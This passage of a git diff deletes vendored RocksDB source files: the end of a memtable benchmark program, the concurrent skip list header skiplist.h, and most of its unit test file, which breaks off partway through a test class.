-    for (int i = 0; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(SeqReadBenchmarkThread(
-          table_, key_gen_, bytes_written, bytes_read, sequence_,
-          num_read_ops_per_thread_, read_hits));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-  }
-};
-
-template <class ReadThreadType>
-class ReadWriteBenchmark : public Benchmark {
- public:
-  explicit ReadWriteBenchmark(MemTableRep* table, KeyGenerator* key_gen,
-                              uint64_t* sequence)
-      : Benchmark(table, key_gen, sequence, FLAGS_num_threads) {
-    num_read_ops_per_thread_ =
-        FLAGS_num_threads <= 1
-            ? 0
-            : (FLAGS_num_operations / (FLAGS_num_threads - 1));
-    num_write_ops_per_thread_ = FLAGS_num_operations;
-  }
-
-  void RunThreads(std::vector<port::Thread>* threads, uint64_t* bytes_written,
-                  uint64_t* bytes_read, bool write,
-                  uint64_t* read_hits) override {
-    std::atomic_int threads_done;
-    threads_done.store(0);
-    threads->emplace_back(ConcurrentFillBenchmarkThread(
-        table_, key_gen_, bytes_written, bytes_read, sequence_,
-        num_write_ops_per_thread_, read_hits, &threads_done));
-    for (int i = 1; i < FLAGS_num_threads; ++i) {
-      threads->emplace_back(
-          ReadThreadType(table_, key_gen_, bytes_written, bytes_read, sequence_,
-                         num_read_ops_per_thread_, read_hits, &threads_done));
-    }
-    for (auto& thread : *threads) {
-      thread.join();
-    }
-  }
-};
-
-}  // namespace rocksdb
-
-void PrintWarnings() {
-#if defined(__GNUC__) && !defined(__OPTIMIZE__)
-  fprintf(stdout,
-          "WARNING: Optimization is disabled: benchmarks unnecessarily slow\n");
-#endif
-#ifndef NDEBUG
-  fprintf(stdout,
-          "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-#endif
-}
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  PrintWarnings();
-
-  rocksdb::Options options;
-
-  std::unique_ptr<rocksdb::MemTableRepFactory> factory;
-  if (FLAGS_memtablerep == "skiplist") {
-    factory.reset(new rocksdb::SkipListFactory);
-#ifndef ROCKSDB_LITE
-  } else if (FLAGS_memtablerep == "vector") {
-    factory.reset(new rocksdb::VectorRepFactory);
-  } else if (FLAGS_memtablerep == "hashskiplist") {
-    factory.reset(rocksdb::NewHashSkipListRepFactory(
-        FLAGS_bucket_count, FLAGS_hashskiplist_height,
-        FLAGS_hashskiplist_branching_factor));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-  } else if (FLAGS_memtablerep == "hashlinklist") {
-    factory.reset(rocksdb::NewHashLinkListRepFactory(
-        FLAGS_bucket_count, FLAGS_huge_page_tlb_size,
-        FLAGS_bucket_entries_logging_threshold,
-        FLAGS_if_log_bucket_dist_when_flash, FLAGS_threshold_use_skiplist));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-  } else if (FLAGS_memtablerep == "cuckoo") {
-    factory.reset(rocksdb::NewHashCuckooRepFactory(
-        FLAGS_write_buffer_size, FLAGS_average_data_size,
-        static_cast<uint32_t>(FLAGS_hash_function_count)));
-    options.prefix_extractor.reset(
-        rocksdb::NewFixedPrefixTransform(FLAGS_prefix_length));
-#endif  // ROCKSDB_LITE
-  } else {
-    fprintf(stdout, "Unknown memtablerep: %s\n", FLAGS_memtablerep.c_str());
-    exit(1);
-  }
-
-  rocksdb::InternalKeyComparator internal_key_comp(
-      rocksdb::BytewiseComparator());
-  rocksdb::MemTable::KeyComparator key_comp(internal_key_comp);
-  rocksdb::Arena arena;
-  rocksdb::WriteBufferManager wb(FLAGS_write_buffer_size);
-  uint64_t sequence;
-  auto createMemtableRep = [&] {
-    sequence = 0;
-    return factory->CreateMemTableRep(key_comp, &arena,
-                                      options.prefix_extractor.get(),
-                                      options.info_log.get());
-  };
-  std::unique_ptr<rocksdb::MemTableRep> memtablerep;
-  rocksdb::Random64 rng(FLAGS_seed);
-  const char* benchmarks = FLAGS_benchmarks.c_str();
-  while (benchmarks != nullptr) {
-    std::unique_ptr<rocksdb::KeyGenerator> key_gen;
-    const char* sep = strchr(benchmarks, ',');
-    rocksdb::Slice name;
-    if (sep == nullptr) {
-      name = benchmarks;
-      benchmarks = nullptr;
-    } else {
-      name = rocksdb::Slice(benchmarks, sep - benchmarks);
-      benchmarks = sep + 1;
-    }
-    std::unique_ptr<rocksdb::Benchmark> benchmark;
-    if (name == rocksdb::Slice("fillseq")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::SEQUENTIAL,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::FillBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("fillrandom")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::UNIQUE_RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::FillBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("readrandom")) {
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("readseq")) {
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::SEQUENTIAL,
-                                              FLAGS_num_operations));
-      benchmark.reset(
-          new rocksdb::SeqReadBenchmark(memtablerep.get(), &sequence));
-    } else if (name == rocksdb::Slice("readwrite")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadWriteBenchmark<
-          rocksdb::ConcurrentReadBenchmarkThread>(memtablerep.get(),
-                                                  key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("seqreadwrite")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadWriteBenchmark<
-          rocksdb::SeqConcurrentReadBenchmarkThread>(memtablerep.get(),
-                                                     key_gen.get(), &sequence));
-    } else {
-      std::cout << "WARNING: skipping unknown benchmark '" << name.ToString()
-                << std::endl;
-      continue;
-    }
-    std::cout << "Running " << name.ToString() << std::endl;
-    benchmark->Run();
-  }
-
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/memtable/skiplist.h b/thirdparty/rocksdb/memtable/skiplist.h
deleted file mode 100644
index 0162dcc..0000000
--- a/thirdparty/rocksdb/memtable/skiplist.h
+++ /dev/null
@@ -1,495 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Thread safety
-// -------------
-//
-// Writes require external synchronization, most likely a mutex.
-// Reads require a guarantee that the SkipList will not be destroyed
-// while the read is in progress.  Apart from that, reads progress
-// without any internal locking or synchronization.
-//
-// Invariants:
-//
-// (1) Allocated nodes are never deleted until the SkipList is
-// destroyed.  This is trivially guaranteed by the code since we
-// never delete any skip list nodes.
-//
-// (2) The contents of a Node except for the next/prev pointers are
-// immutable after the Node has been linked into the SkipList.
-// Only Insert() modifies the list, and it is careful to initialize
-// a node and use release-stores to publish the nodes in one or
-// more lists.
-//
-// ... prev vs. next pointer ordering ...
-//
-
-#pragma once
-#include <assert.h>
-#include <atomic>
-#include <stdlib.h>
-#include "port/port.h"
-#include "util/allocator.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-template<typename Key, class Comparator>
-class SkipList {
- private:
-  struct Node;
-
- public:
-  // Create a new SkipList object that will use "cmp" for comparing keys,
-  // and will allocate memory using "*allocator".  Objects allocated in the
-  // allocator must remain allocated for the lifetime of the skiplist object.
-  explicit SkipList(Comparator cmp, Allocator* allocator,
-                    int32_t max_height = 12, int32_t branching_factor = 4);
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  void Insert(const Key& key);
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  bool Contains(const Key& key) const;
-
-  // Return estimated number of entries smaller than `key`.
-  uint64_t EstimateCount(const Key& key) const;
-
-  // Iteration over the contents of a skip list
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(const SkipList* list);
-
-    // Change the underlying skiplist used for this iterator
-    // This enables us not changing the iterator without deallocating
-    // an old one and then allocating a new one
-    void SetList(const SkipList* list);
-
-    // Returns true iff the iterator is positioned at a valid node.
-    bool Valid() const;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    const Key& key() const;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    void Next();
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    void Prev();
-
-    // Advance to the first entry with a key >= target
-    void Seek(const Key& target);
-
-    // Retreat to the last entry with a key <= target
-    void SeekForPrev(const Key& target);
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToFirst();
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToLast();
-
-   private:
-    const SkipList* list_;
-    Node* node_;
-    // Intentionally copyable
-  };
-
- private:
-  const uint16_t kMaxHeight_;
-  const uint16_t kBranching_;
-  const uint32_t kScaledInverseBranching_;
-
-  // Immutable after construction
-  Comparator const compare_;
-  Allocator* const allocator_;    // Allocator used for allocations of nodes
-
-  Node* const head_;
-
-  // Modified only by Insert().  Read racily by readers, but stale
-  // values are ok.
-  std::atomic<int> max_height_;  // Height of the entire list
-
-  // Used for optimizing sequential insert patterns.  Tricky.  prev_[i] for
-  // i up to max_height_ is the predecessor of prev_[0] and prev_height_
-  // is the height of prev_[0].  prev_[0] can only be equal to head before
-  // insertion, in which case max_height_ and prev_height_ are 1.
-  Node** prev_;
-  int32_t prev_height_;
-
-  inline int GetMaxHeight() const {
-    return max_height_.load(std::memory_order_relaxed);
-  }
-
-  Node* NewNode(const Key& key, int height);
-  int RandomHeight();
-  bool Equal(const Key& a, const Key& b) const { return (compare_(a, b) == 0); }
-  bool LessThan(const Key& a, const Key& b) const {
-    return (compare_(a, b) < 0);
-  }
-
-  // Return true if key is greater than the data stored in "n"
-  bool KeyIsAfterNode(const Key& key, Node* n) const;
-
-  // Returns the earliest node with a key >= key.
-  // Return nullptr if there is no such node.
-  Node* FindGreaterOrEqual(const Key& key) const;
-
-  // Return the latest node with a key < key.
-  // Return head_ if there is no such node.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [0..max_height_-1], if prev is non-null.
-  Node* FindLessThan(const Key& key, Node** prev = nullptr) const;
-
-  // Return the last node in the list.
-  // Return head_ if list is empty.
-  Node* FindLast() const;
-
-  // No copying allowed
-  SkipList(const SkipList&);
-  void operator=(const SkipList&);
-};
-
-// Implementation details follow
-template<typename Key, class Comparator>
-struct SkipList<Key, Comparator>::Node {
-  explicit Node(const Key& k) : key(k) { }
-
-  Key const key;
-
-  // Accessors/mutators for links.  Wrapped in methods so we can
-  // add the appropriate barriers as necessary.
-  Node* Next(int n) {
-    assert(n >= 0);
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return (next_[n].load(std::memory_order_acquire));
-  }
-  void SetNext(int n, Node* x) {
-    assert(n >= 0);
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_[n].store(x, std::memory_order_release);
-  }
-
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next(int n) {
-    assert(n >= 0);
-    return next_[n].load(std::memory_order_relaxed);
-  }
-  void NoBarrier_SetNext(int n, Node* x) {
-    assert(n >= 0);
-    next_[n].store(x, std::memory_order_relaxed);
-  }
-
- private:
-  // Array of length equal to the node height.  next_[0] is lowest level link.
-  std::atomic<Node*> next_[1];
-};
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node*
-SkipList<Key, Comparator>::NewNode(const Key& key, int height) {
-  char* mem = allocator_->AllocateAligned(
-      sizeof(Node) + sizeof(std::atomic<Node*>) * (height - 1));
-  return new (mem) Node(key);
-}
-
-template<typename Key, class Comparator>
-inline SkipList<Key, Comparator>::Iterator::Iterator(const SkipList* list) {
-  SetList(list);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SetList(const SkipList* list) {
-  list_ = list;
-  node_ = nullptr;
-}
-
-template<typename Key, class Comparator>
-inline bool SkipList<Key, Comparator>::Iterator::Valid() const {
-  return node_ != nullptr;
-}
-
-template<typename Key, class Comparator>
-inline const Key& SkipList<Key, Comparator>::Iterator::key() const {
-  assert(Valid());
-  return node_->key;
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Next() {
-  assert(Valid());
-  node_ = node_->Next(0);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Prev() {
-  // Instead of using explicit "prev" links, we just search for the
-  // last node that falls before key.
-  assert(Valid());
-  node_ = list_->FindLessThan(node_->key);
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Seek(const Key& target) {
-  node_ = list_->FindGreaterOrEqual(target);
-}
-
-template <typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekForPrev(
-    const Key& target) {
-  Seek(target);
-  if (!Valid()) {
-    SeekToLast();
-  }
-  while (Valid() && list_->LessThan(target, key())) {
-    Prev();
-  }
-}
-
-template <typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekToFirst() {
-  node_ = list_->head_->Next(0);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekToLast() {
-  node_ = list_->FindLast();
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template<typename Key, class Comparator>
-int SkipList<Key, Comparator>::RandomHeight() {
-  auto rnd = Random::GetTLSInstance();
-
-  // Increase height with probability 1 in kBranching
-  int height = 1;
-  while (height < kMaxHeight_ && rnd->Next() < kScaledInverseBranching_) {
-    height++;
-  }
-  assert(height > 0);
-  assert(height <= kMaxHeight_);
-  return height;
-}
-
-template<typename Key, class Comparator>
-bool SkipList<Key, Comparator>::KeyIsAfterNode(const Key& key, Node* n) const {
-  // nullptr n is considered infinite
-  return (n != nullptr) && (compare_(n->key, key) < 0);
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node* SkipList<Key, Comparator>::
-  FindGreaterOrEqual(const Key& key) const {
-  // Note: It looks like we could reduce duplication by implementing
-  // this function as FindLessThan(key)->Next(0), but we wouldn't be able
-  // to exit early on equality and the result wouldn't even be correct.
-  // A concurrent insert might occur after FindLessThan(key) but before
-  // we get a chance to call Next(0).
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  Node* last_bigger = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    // Make sure the lists are sorted
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->key, x));
-    // Make sure we haven't overshot during our search
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    int cmp = (next == nullptr || next == last_bigger)
-        ? 1 : compare_(next->key, key);
-    if (cmp == 0 || (cmp > 0 && level == 0)) {
-      return next;
-    } else if (cmp < 0) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      // Switch to next list, reuse compare_() result
-      last_bigger = next;
-      level--;
-    }
-  }
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node*
-SkipList<Key, Comparator>::FindLessThan(const Key& key, Node** prev) const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  // KeyIsAfter(key, last_not_after) is definitely false
-  Node* last_not_after = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->key, x));
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    if (next != last_not_after && KeyIsAfterNode(key, next)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      if (prev != nullptr) {
-        prev[level] = x;
-      }
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list, reuse KeyIUsAfterNode() result
-        last_not_after = next;
-        level--;
-      }
-    }
-  }
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node* SkipList<Key, Comparator>::FindLast()
-    const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    Node* next = x->Next(level);
-    if (next == nullptr) {
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list
-        level--;
-      }
-    } else {
-      x = next;
-    }
-  }
-}
-
-template <typename Key, class Comparator>
-uint64_t SkipList<Key, Comparator>::EstimateCount(const Key& key) const {
-  uint64_t count = 0;
-
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    assert(x == head_ || compare_(x->key, key) < 0);
-    Node* next = x->Next(level);
-    if (next == nullptr || compare_(next->key, key) >= 0) {
-      if (level == 0) {
-        return count;
-      } else {
-        // Switch to next list
-        count *= kBranching_;
-        level--;
-      }
-    } else {
-      x = next;
-      count++;
-    }
-  }
-}
-
-template <typename Key, class Comparator>
-SkipList<Key, Comparator>::SkipList(const Comparator cmp, Allocator* allocator,
-                                    int32_t max_height,
-                                    int32_t branching_factor)
-    : kMaxHeight_(max_height),
-      kBranching_(branching_factor),
-      kScaledInverseBranching_((Random::kMaxNext + 1) / kBranching_),
-      compare_(cmp),
-      allocator_(allocator),
-      head_(NewNode(0 /* any key will do */, max_height)),
-      max_height_(1),
-      prev_height_(1) {
-  assert(max_height > 0 && kMaxHeight_ == static_cast<uint32_t>(max_height));
-  assert(branching_factor > 0 &&
-         kBranching_ == static_cast<uint32_t>(branching_factor));
-  assert(kScaledInverseBranching_ > 0);
-  // Allocate the prev_ Node* array, directly from the passed-in allocator.
-  // prev_ does not need to be freed, as its life cycle is tied up with
-  // the allocator as a whole.
-  prev_ = reinterpret_cast<Node**>(
-            allocator_->AllocateAligned(sizeof(Node*) * kMaxHeight_));
-  for (int i = 0; i < kMaxHeight_; i++) {
-    head_->SetNext(i, nullptr);
-    prev_[i] = head_;
-  }
-}
-
-template<typename Key, class Comparator>
-void SkipList<Key, Comparator>::Insert(const Key& key) {
-  // fast path for sequential insertion
-  if (!KeyIsAfterNode(key, prev_[0]->NoBarrier_Next(0)) &&
-      (prev_[0] == head_ || KeyIsAfterNode(key, prev_[0]))) {
-    assert(prev_[0] != head_ || (prev_height_ == 1 && GetMaxHeight() == 1));
-
-    // Outside of this method prev_[1..max_height_] is the predecessor
-    // of prev_[0], and prev_height_ refers to prev_[0].  Inside Insert
-    // prev_[0..max_height - 1] is the predecessor of key.  Switch from
-    // the external state to the internal
-    for (int i = 1; i < prev_height_; i++) {
-      prev_[i] = prev_[0];
-    }
-  } else {
-    // TODO(opt): we could use a NoBarrier predecessor search as an
-    // optimization for architectures where memory_order_acquire needs
-    // a synchronization instruction.  Doesn't matter on x86
-    FindLessThan(key, prev_);
-  }
-
-  // Our data structure does not allow duplicate insertion
-  assert(prev_[0]->Next(0) == nullptr || !Equal(key, prev_[0]->Next(0)->key));
-
-  int height = RandomHeight();
-  if (height > GetMaxHeight()) {
-    for (int i = GetMaxHeight(); i < height; i++) {
-      prev_[i] = head_;
-    }
-    //fprintf(stderr, "Change height from %d to %d\n", max_height_, height);
-
-    // It is ok to mutate max_height_ without any synchronization
-    // with concurrent readers.  A concurrent reader that observes
-    // the new value of max_height_ will see either the old value of
-    // new level pointers from head_ (nullptr), or a new value set in
-    // the loop below.  In the former case the reader will
-    // immediately drop to the next level since nullptr sorts after all
-    // keys.  In the latter case the reader will use the new node.
-    max_height_.store(height, std::memory_order_relaxed);
-  }
-
-  Node* x = NewNode(key, height);
-  for (int i = 0; i < height; i++) {
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(i, prev_[i]->NoBarrier_Next(i));
-    prev_[i]->SetNext(i, x);
-  }
-  prev_[0] = x;
-  prev_height_ = height;
-}
-
-template<typename Key, class Comparator>
-bool SkipList<Key, Comparator>::Contains(const Key& key) const {
-  Node* x = FindGreaterOrEqual(key);
-  if (x != nullptr && Equal(key, x->key)) {
-    return true;
-  } else {
-    return false;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/skiplist_test.cc b/thirdparty/rocksdb/memtable/skiplist_test.cc
deleted file mode 100644
index 50c3588..0000000
--- a/thirdparty/rocksdb/memtable/skiplist_test.cc
+++ /dev/null
@@ -1,388 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "memtable/skiplist.h"
-#include <set>
-#include "rocksdb/env.h"
-#include "util/arena.h"
-#include "util/hash.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-typedef uint64_t Key;
-
-struct TestComparator {
-  int operator()(const Key& a, const Key& b) const {
-    if (a < b) {
-      return -1;
-    } else if (a > b) {
-      return +1;
-    } else {
-      return 0;
-    }
-  }
-};
-
-class SkipTest : public testing::Test {};
-
-TEST_F(SkipTest, Empty) {
-  Arena arena;
-  TestComparator cmp;
-  SkipList<Key, TestComparator> list(cmp, &arena);
-  ASSERT_TRUE(!list.Contains(10));
-
-  SkipList<Key, TestComparator>::Iterator iter(&list);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToFirst();
-  ASSERT_TRUE(!iter.Valid());
-  iter.Seek(100);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekForPrev(100);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToLast();
-  ASSERT_TRUE(!iter.Valid());
-}
-
-TEST_F(SkipTest, InsertAndLookup) {
-  const int N = 2000;
-  const int R = 5000;
-  Random rnd(1000);
-  std::set<Key> keys;
-  Arena arena;
-  TestComparator cmp;
-  SkipList<Key, TestComparator> list(cmp, &arena);
-  for (int i = 0; i < N; i++) {
-    Key key = rnd.Next() % R;
-    if (keys.insert(key).second) {
-      list.Insert(key);
-    }
-  }
-
-  for (int i = 0; i < R; i++) {
-    if (list.Contains(i)) {
-      ASSERT_EQ(keys.count(i), 1U);
-    } else {
-      ASSERT_EQ(keys.count(i), 0U);
-    }
-  }
-
-  // Simple iterator tests
-  {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    ASSERT_TRUE(!iter.Valid());
-
-    iter.Seek(0);
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), iter.key());
-
-    iter.SeekForPrev(R - 1);
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), iter.key());
-
-    iter.SeekToFirst();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), iter.key());
-
-    iter.SeekToLast();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), iter.key());
-  }
-
-  // Forward iteration test
-  for (int i = 0; i < R; i++) {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    iter.Seek(i);
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.lower_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.end()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*model_iter, iter.key());
-        ++model_iter;
-        iter.Next();
-      }
-    }
-  }
-
-  // Backward iteration test
-  for (int i = 0; i < R; i++) {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    iter.SeekForPrev(i);
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.upper_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.begin()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*--model_iter, iter.key());
-        iter.Prev();
-      }
-    }
-  }
-}
-
-// We want to make sure that with a single writer and multiple
-// concurrent readers (with no synchronization other than when a
-// reader's iterator is created), the reader always observes all the
-// data that was present in the skip list when the iterator was
-// constructor.  Because insertions are happening concurrently, we may
-// also observe new values that were inserted since the iterator was
-// constructed, but we should never miss any values that were present
-// at iterator construction time.
-//
-// We generate multi-part keys:
-//     <key,gen,hash>
-// where:
-//     key is in range [0..K-1]
-//     gen is a generation number for key
-//     hash is hash(key,gen)
-//
-// The insertion code picks a random key, sets gen to be 1 + the last
-// generation number inserted for that key, and sets hash to Hash(key,gen).
-//
-// At the beginning of a read, we snapshot the last inserted
-// generation number for each key.  We then iterate, including random
-// calls to Next() and Seek().  For every key we encounter, we
-// check that it is either expected given the initial snapshot or has
-// been concurrently added since the iterator started.
-class ConcurrentTest {
- private:
-  static const uint32_t K = 4;
-
-  static uint64_t key(Key key) { return (key >> 40); }
-  static uint64_t gen(Key key) { return (key >> 8) & 0xffffffffu; }
-  static uint64_t hash(Key key) { return key & 0xff; }
-
-  static uint64_t HashNumbers(uint64_t k, uint64_t g) {
-    uint64_t data[2] = { k, g };
-    return Hash(reinterpret_cast<char*>(data), sizeof(data), 0);
-  }
-
-  static Key MakeKey(uint64_t k, uint64_t g) {
-    assert(sizeof(Key) == sizeof(uint64_t));
-    assert(k <= K);  // We sometimes pass K to seek to the end of the skiplist
-    assert(g <= 0xffffffffu);
-    return ((k << 40) | (g << 8) | (HashNumbers(k, g) & 0xff));
-  }
-
-  static bool IsValidKey(Key k) {
-    return hash(k) == (HashNumbers(key(k), gen(k)) & 0xff);
-  }
-
-  static Key RandomTarget(Random* rnd) {
-    switch (rnd->Next() % 10) {
-      case 0:
-        // Seek to beginning
-        return MakeKey(0, 0);
-      case 1:
-        // Seek to end
-        return MakeKey(K, 0);
-      default:
-        // Seek to middle
-        return MakeKey(rnd->Next() % K, 0);
-    }
-  }
-
-  // Per-key generation
-  struct State {
-    std::atomic<int> generation[K];
-    void Set(int k, int v) {
-      generation[k].store(v, std::memory_order_release);
-    }
-    int Get(int k) { return generation[k].load(std::memory_order_acquire); }
-
-    State() {
-      for (unsigned int k = 0; k < K; k++) {
-        Set(k, 0);
-      }
-    }
-  };
-
-  // Current state of the test
-  State current_;
-
-  Arena arena_;
-
-  // SkipList is not protected by mu_.  We just use a single writer
-  // thread to modify it.
-  SkipList<Key, TestComparator> list_;
-
- public:
-  ConcurrentTest() : list_(TestComparator(), &arena_) {}
-
-  // REQUIRES: External synchronization
-  void WriteStep(Random* rnd) {
-    const uint32_t k = rnd->Next() % K;
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    list_.Insert(new_key);
-    current_.Set(k, g);
-  }
-
-  void ReadStep(Random* rnd) {
-    // Remember the initial committed state of the skiplist.
-    State initial_state;
-    for (unsigned int k = 0; k < K; k++) {
-      initial_state.Set(k, current_.Get(k));
-    }
-
-    Key pos = RandomTarget(rnd);
-    SkipList<Key, TestComparator>::Iterator iter(&list_);
-    iter.Seek(pos);
-    while (true) {
-      Key current;
-      if (!iter.Valid()) {
-        current = MakeKey(K, 0);
-      } else {
-        current = iter.key();
-        ASSERT_TRUE(IsValidKey(current)) << current;
-      }
-      ASSERT_LE(pos, current) << "should not go backwards";
-
-      // Verify that everything in [pos,current) was not present in
-      // initial_state.
-      while (pos < current) {
-        ASSERT_LT(key(pos), K) << pos;
-
-        // Note that generation 0 is never inserted, so it is ok if
-        // <*,0,*> is missing.
-        ASSERT_TRUE((gen(pos) == 0U) ||
-                    (gen(pos) > static_cast<uint64_t>(initial_state.Get(
-                                    static_cast<int>(key(pos))))))
-            << "key: " << key(pos) << "; gen: " << gen(pos)
-            << "; initgen: " << initial_state.Get(static_cast<int>(key(pos)));
-
-        // Advance to next key in the valid key space
-        if (key(pos) < key(current)) {
-          pos = MakeKey(key(pos) + 1, 0);
-        } else {
-          pos = MakeKey(key(pos), gen(pos) + 1);
-        }
-      }
-
-      if (!iter.Valid()) {
-        break;
-      }
-
-      if (rnd->Next() % 2) {
-        iter.Next();
-        pos = MakeKey(key(pos), gen(pos) + 1);
-      } else {
-        Key new_target = RandomTarget(rnd);
-        if (new_target > pos) {
-          pos = new_target;
-          iter.Seek(new_target);
-        }
-      }
-    }
-  }
-};
-const uint32_t ConcurrentTest::K;
-
-// Simple test that does single-threaded testing of the ConcurrentTest
-// scaffolding.
-TEST_F(SkipTest, ConcurrentWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    test.WriteStep(&rnd);
-  }
-}
-
-class TestState {
- public:
-  ConcurrentTest t_;
-  int seed_;
-  std::atomic<bool> quit_flag_;
